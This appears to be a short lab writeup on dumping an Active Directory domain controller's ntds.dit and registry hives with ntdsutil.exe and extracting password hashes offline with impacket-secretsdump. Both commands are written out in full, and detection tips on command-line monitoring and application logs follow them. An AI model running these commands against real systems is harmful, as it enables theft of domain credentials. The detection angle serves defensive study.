Dumping the required files using a native windows binary ntdsutil.exe to c:\temp:
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
We can see that the ntds.dit and SYSTEM as well as SECURITY registry hives are being dumped to c:\temp:
We can then dump password hashes:
[email protected]~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local
On the victim machine, no susprises:
Monitoring commandline arguments is as usual a good idea as it can reveal attempts to dump ntds.dit:
Additionally, there are multiple Application logs that can indicate some activity around the ntds.dit which you may be interested in investigating further: